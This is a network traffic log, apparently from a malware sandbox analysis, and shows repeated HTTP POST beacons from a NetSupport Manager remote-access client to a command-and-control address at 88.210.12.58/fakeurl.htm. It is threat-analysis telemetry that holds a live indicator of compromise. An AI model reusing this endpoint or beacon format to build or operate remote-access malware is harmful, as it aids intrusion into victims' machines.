Dec 10, 2024 08:59:03.136993885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:03.238013029 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:03.339010954 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:03.440004110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:03.544714928 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:03.643364906 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:03.744714975 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:03.844728947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:03.958698988 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:04.480142117 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:04.580005884 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:04.681015015 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:04.782020092 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:04.882004976 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:04.984714985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.084718943 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.183000088 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.284718990 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.384010077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.484725952 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.585000992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.688631058 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.786067963 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.887016058 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:05.988080978 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.089052916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.189044952 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.290071011 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.389987946 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.490015030 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.591088057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.691080093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.792028904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.892992020 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:06.993014097 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:07.096721888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:07.195152998 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:07.295993090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:07.396042109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:07.497008085 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:07.597995996 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:07.698987007 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:07.798985958 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:07.900006056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:08.000078917 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:08.101047039 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:08.201014042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:08.302015066 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:08.401984930 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:08.503010035 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:08.604006052 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:08.705588102 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:09.268986940 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:09.370860100 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:09.470005989 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:09.571053982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:09.674891949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:09.774944067 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:09.874998093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:09.972022057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.073051929 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.174120903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.274996042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.375006914 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.475999117 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.577003956 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.677016020 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.777995110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.878057957 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:10.979017973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:11.082783937 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:11.179999113 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:11.282943964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:11.382028103 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:11.483103991 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:11.627696991 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:11.733144045 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:11.945976019 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:12.148056984 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:12.248091936 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:12.349005938 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:12.450032949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:12.551058054 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:12.651041985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:12.751022100 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:12.853905916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:12.958794117 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:13.059115887 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:13.158795118 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:13.258877993 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:13.358721972 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:13.456994057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:13.558003902 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
